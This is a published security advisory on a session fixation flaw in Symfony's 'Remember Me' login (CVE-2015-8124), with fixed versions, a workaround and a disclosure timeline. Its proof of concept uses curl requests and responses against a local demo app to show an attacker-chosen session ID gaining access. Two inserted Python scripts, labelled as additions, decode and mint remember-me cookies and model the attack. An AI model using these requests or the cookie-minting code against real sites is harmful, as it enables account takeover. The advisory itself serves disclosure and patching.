Symfony PHP Framework Session Fixation

Published 22 Dec 2015, reported by redteam-pentesting.de, source: packetstormsecurity.com

A session fixation vulnerability in the Symfony PHP framework's "Remember Me" login functionality allows an attacker who already knows (or has planted) the victim's session ID to impersonate the victim towards the web application. Affected versions: 2.3.0 - 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6.

Advisory: Symfony PHP Framework: Session Fixation In "Remember Me" Login
Functionality
  
A session fixation vulnerability within the Symfony web application  
framework's "Remember Me" login functionality allows an attacker to  
impersonate the victim towards the web application if the session ID  
value was previously known to the attacker.  
  
  
Details  
=======  
  
Product: Symfony  
Affected Versions: 2.3.0 - 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6
Fixed Versions: 2.3.35, 2.6.12, and 2.7.7 [2]  
Vulnerability Type: Session Fixation  
Security Risk: low  
Vendor URL: https://symfony.com/  
Vendor Status: fixed version released [2]  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-013  
Advisory Status: published  
CVE: CVE-2015-8124 (see [2])
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8124
  
  
Introduction  
============  
  
"Symfony is a set of PHP Components, a Web Application framework, a  
Philosophy, and a Community — all working together in harmony."  
  
(from Symfony's homepage)  
  
  
More Details  
============  
  
The following details are explained using the official Symfony Demo  
application[0]. The "Remember Me" login functionality was activated  
according to [1]. The security configuration file was modified as  
follows:  
  
-- app/config/security.yml ---------------------------------------------

security:
    [...]
    firewalls:
        secured_area:
            [...]
            remember_me:
                key: "IdOpAkToufatt8knawt{"
                lifetime: 604800
                path: /
                always_remember_me: true

------------------------------------------------------------------------
  
If the following URL is requested, the Symfony application redirects to  
a login screen where a username and password must be supplied:  
  
$ curl -I 'http://localhost:8000/en/admin/post/'  
HTTP/1.1 302 Found  
Host: localhost:8000  
[...]  
Set-Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3; path=/  
Location: http://localhost:8000/en/login  
  
On submission, an HTTP POST request is performed by the browser:  
  
POST /en/login_check HTTP/1.1  
Host: localhost:8000  
Referer: http://localhost:8000/en/login  
Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3  
[...]  
  
_username=anna_admin  
&_password=kitten  
&_csrf_token=h_s6ltxHB3gbGU--SIY6wLCUGf84bLmhs1_LGFEBsUI  
  
If the supplied credentials are correct, the Symfony application  
responds as follows:  
  
HTTP/1.1 302 Found  
Host: localhost:8000  
Set-Cookie: PHPSESSID=vk2e3enjr0uafgonr0i3u2b4t5; path=/  
Set-Cookie: REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnP  
T06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y  
2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk; expires=Thu,  
29-Oct-2015 12:27:14 GMT; Max-Age=604800;  
Location: http://localhost:8000/en/admin/post/  
[...]  
  
The cookie PHPSESSID is set to a new value and a new cookie named  
REMEMBERME is set in the client. The PHPSESSID is a session cookie  
only and has a limited lifetime. In contrast, the REMEMBERME cookie has  
a validity of one week. It allows users to stay logged in for longer  
than the regular session lasts.  
  
The REMEMBERME cookie's value consists of four data fields separated by  
colons and is encoded in base64. The first data field references the  
application's user object, followed by the base64-encoded username. The  
third data field is a timestamp of the cookie's expiration date. The  
last one is a MAC value to protect the other three against manipulation.  
  
$ base64 -d <<< QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ\  
0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y2IwOWY0OWY3MTFhOD\  
NhMjUxNmU0OWE4Njg2MTVmNWRk  
AppBundle\Entity\User:YW5uYV9hZG1pbg==:1446121634:f09138bc[...]68615f5dd  
  
$ base64 -d <<< YW5uYV9hZG1pbg==  
anna_admin  
  
$ date -d @1446121634  
Thu Oct 29 13:27:14 CET 2015  
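The decoding steps above, as an added example that is not part of the original advisory and not Symfony's own code: a small Python script that parses the cookie value captured above into its four fields (class, username, expiry, MAC), and then mints and verifies cookies of the same shape. The MAC construction it uses, HMAC-SHA256 over the concatenation of class, username, expiry and the user's password hash, keyed with the configured remember_me key, is my reading of Symfony 2.x's TokenBasedRememberMeServices and is an assumption here; the advisory only states that the fourth field is a MAC. The password hash below is a constructed placeholder, so the MACs minted here will not match the captured cookie's MAC.

```python
import base64
import hashlib
import hmac
from datetime import datetime, timezone

# REMEMBERME value captured in the advisory (the three wrapped lines joined).
ADVISORY_COOKIE = (
    "QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnP"
    "T06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y"
    "2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk"
)
# Key from the advisory's security.yml; the password hash is a constructed
# placeholder, so MACs minted here do not match the captured cookie's MAC.
KEY = "IdOpAkToufatt8knawt{"
PASSWORD_HASH = "constructed-bcrypt-hash-placeholder"


def parse_cookie(value):
    """Return (class, username, expires, mac) or None if the shape is wrong.

    Layout per the advisory: base64(class:base64(username):expires:mac).
    Malformed input is rejected here so it never reaches the MAC comparison.
    """
    try:
        raw = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    parts = raw.split(":")
    if len(parts) != 4:
        return None
    cls, user_b64, expires, mac = parts
    try:
        username = base64.b64decode(user_b64, validate=True).decode("utf-8")
        expires = int(expires)
    except (ValueError, UnicodeDecodeError):
        return None
    return cls, username, expires, mac


def expiry_utc(expires):
    """Render the third field the way `date -d @<ts>` does, but in UTC."""
    return datetime.fromtimestamp(expires, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def cookie_mac(cls, username, expires, password_hash, key):
    # Assumed construction (Symfony 2.x TokenBasedRememberMeServices as I read
    # it): HMAC-SHA256 over class||username||expires||password, keyed with the
    # remember_me key. Binding the password hash means a password change
    # invalidates outstanding cookies.
    msg = f"{cls}{username}{expires}{password_hash}".encode()
    return hmac.new(key.encode(), msg, hashlib.sha256).hexdigest()


def mint_cookie(cls, username, expires, password_hash, key):
    """Build a cookie of the advisory's shape for the given user and expiry."""
    mac = cookie_mac(cls, username, expires, password_hash, key)
    user_b64 = base64.b64encode(username.encode()).decode()
    raw = f"{cls}:{user_b64}:{expires}:{mac}"
    return base64.b64encode(raw.encode()).decode()


def verify_cookie(value, password_hash, key, now):
    """Return the username if the MAC is valid and the cookie is unexpired."""
    parsed = parse_cookie(value)
    if parsed is None:
        return None
    cls, username, expires, mac = parsed
    if expires < now:
        return None
    expected = cookie_mac(cls, username, expires, password_hash, key)
    if not hmac.compare_digest(expected, mac):
        return None
    return username


def reuse_mac_for(value, other_username):
    """Attacker attempt: keep a captured MAC but swap in another username."""
    cls, _, expires, mac = parse_cookie(value)
    user_b64 = base64.b64encode(other_username.encode()).decode()
    raw = f"{cls}:{user_b64}:{expires}:{mac}"
    return base64.b64encode(raw.encode()).decode()


if __name__ == "__main__":
    cls, user, expires, mac = parse_cookie(ADVISORY_COOKIE)
    print(cls, user, expiry_utc(expires), mac[:8] + "...")
    c = mint_cookie(cls, user, expires, PASSWORD_HASH, KEY)
    print(verify_cookie(c, PASSWORD_HASH, KEY, now=expires - 1))  # anna_admin
    print(verify_cookie(c, PASSWORD_HASH, KEY, now=expires + 1))  # None (expired)
    print(verify_cookie(reuse_mac_for(c, "tom_admin"), PASSWORD_HASH, KEY, now=0))  # None
```

The MAC protects the three plaintext fields against tampering, which is why the advisory's attack does not touch the cookie at all: the weakness is in what the application does with the session after the cookie has been accepted, not in the cookie itself.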
  
  
Proof of Concept  
================  
  
If the following URL is requested with an arbitrary, unauthenticated
session ID (here the attacker-chosen value "redteam"), the Symfony
application redirects to the login page (as already shown above):
  
$ curl -I 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam'  
HTTP/1.1 302 Found  
Host: localhost:8000  
Location: http://localhost:8000/en/login  
[...]  
  
In the case that a valid REMEMBERME cookie is included in the HTTP  
request, the user is successfully authenticated:  
  
$ curl -s -i 'http://localhost:8000/en/admin/post/' \  
-b 'PHPSESSID=redteam; REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZ'\  
'VjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1N'\  
'GU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk'  
HTTP/1.1 200 OK  
Host: localhost:8000  
[...]  
  
<!DOCTYPE html>  
<html>  
[...]  
<tr>  
<td>In hac habitasse platea dictumst</td>  
<td>[email protected]</td>  
<td>8/23/15, 10:16 AM</td>  
[...]  
  
After this HTTP request, the PHPSESSID value alone suffices to
authenticate the user: unlike the regular login procedure, the
"Remember Me" login did not assign a new value to the PHPSESSID cookie.
An attacker who knows the cookie's value, or who earlier managed to set
a chosen value in the user's browser, can therefore access the web
application with the user's permissions:
  
$ curl -s -i 'http://localhost:8000/en/admin/post/' \  
-b 'PHPSESSID=redteam'  
HTTP/1.1 200 OK  
Host: localhost:8000  
[...]  
  
<!DOCTYPE html>  
<html>  
[...]  
<tr>  
<td>In hac habitasse platea dictumst</td>  
<td>[email protected]</td>  
<td>8/23/15, 10:16 AM</td>  
[...]  
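The proof of concept above, modelled in code as an added example that is neither the advisory's nor Symfony's code: a minimal in-memory application with the two login paths the advisory contrasts, the regular form login (which assigns a new session ID) and the "Remember Me" auto-login (which, in the affected versions, did not). The REMEMBERME cookie check is stubbed to a constant, since the cookie's validity is not what the attack exploits; the point is only what happens to an attacker-chosen session ID once the victim is auto-logged in under it. The fixed branch does what the form login already does in the advisory: assign a fresh session ID once the user has been authenticated.

```python
import secrets

# Constructed stand-in for a valid REMEMBERME cookie; the real cookie's
# MAC check is out of scope for this model.
VALID_REMEMBERME = "valid-rememberme-cookie-for-anna_admin"
LOGIN_FORM, ADMIN_PAGE = 302, 200  # status codes seen in the advisory's curl output


class App:
    """In-memory stand-in for the demo application's two login paths."""

    def __init__(self, migrate_on_rememberme):
        self.migrate_on_rememberme = migrate_on_rememberme
        self.sessions = {}  # PHPSESSID -> session data

    def _session(self, sid):
        # Like PHP with an attacker-chosen ID: an unknown PHPSESSID simply
        # gets an empty session created under that ID. This is what makes
        # fixation possible in the first place.
        return self.sessions.setdefault(sid, {})

    def _migrate(self, sid):
        """Move the session data under a fresh ID and retire the old one."""
        data = self.sessions.pop(sid)
        new_sid = secrets.token_hex(13)
        self.sessions[new_sid] = data
        return new_sid

    def login_form(self, sid, username, password):
        """POST /en/login_check: on success the session ID is rotated."""
        session = self._session(sid)
        if (username, password) != ("anna_admin", "kitten"):
            return LOGIN_FORM, sid
        session["user"] = username
        return LOGIN_FORM, self._migrate(sid)  # redirect to /en/admin/post/

    def request_admin(self, sid, rememberme=None):
        """GET /en/admin/post/; returns (status, PHPSESSID the client now holds)."""
        session = self._session(sid)
        if "user" in session:
            return ADMIN_PAGE, sid
        if rememberme == VALID_REMEMBERME:
            session["user"] = "anna_admin"
            if self.migrate_on_rememberme:
                return ADMIN_PAGE, self._migrate(sid)  # fixed: old ID retired
            return ADMIN_PAGE, sid                     # vulnerable: "redteam" stays valid
        return LOGIN_FORM, sid


def attack(app):
    """Replay the advisory's PoC; returns the three status codes observed."""
    # The attacker-chosen (or leaked) ID "redteam" is not authenticated on its own.
    unauth_status, _ = app.request_admin("redteam")
    # The victim's browser sends that PHPSESSID together with a valid REMEMBERME.
    victim_status, _ = app.request_admin("redteam", rememberme=VALID_REMEMBERME)
    # The attacker then replays the bare ID, without any REMEMBERME cookie.
    attacker_status, _ = app.request_admin("redteam")
    return unauth_status, victim_status, attacker_status


if __name__ == "__main__":
    print("vulnerable:", attack(App(migrate_on_rememberme=False)))  # (302, 200, 200)
    print("fixed:     ", attack(App(migrate_on_rememberme=True)))   # (302, 200, 302)
```

The same replay against a live deployment is the check to run after upgrading: a remember-me auto-login that answers with a Set-Cookie for a new PHPSESSID, and a subsequent request with the old PHPSESSID that is redirected to the login page, shows the fix is active.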
  
  
Workaround  
==========  
  
Disable the "Remember Me" login functionality within the configuration  
file security.yml.  
  
  
Fix  
===  
  
Upgrade to a fixed version if possible, otherwise refer to section  
Workaround.  
  
  
Security Risk  
=============  
  
The described vulnerability allows an attacker to access a Symfony web
application with the attacked user's permissions. The attack requires
that the "Remember Me" login functionality is used by the application.
Additionally, the attacker must either have obtained the PHPSESSID
cookie value or have successfully set a chosen value in the user's
browser. Because of these preconditions, the described vulnerability
poses a low risk on its own. The rating may rise to medium or high
depending on the affected web application and the data reachable
through it.
  
  
Timeline  
========  
  
2015-09-11 Vulnerability identified  
2015-09-16 Customer approved disclosure to vendor  
2015-10-27 Vendor notified  
2015-11-23 Fixed by vendor [2]  
2015-12-22 Advisory released  
  
  
References  
==========  
  
[0] https://github.com/symfony/symfony-demo  
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html  
[2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
--
RedTeam Pentesting GmbH                      Tel.: +49 241 510081-0
Dennewartstr. 25-27                          Fax : +49 241 510081-99
52068 Aachen                                 https://www.redteam-pentesting.de
Germany                                      Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
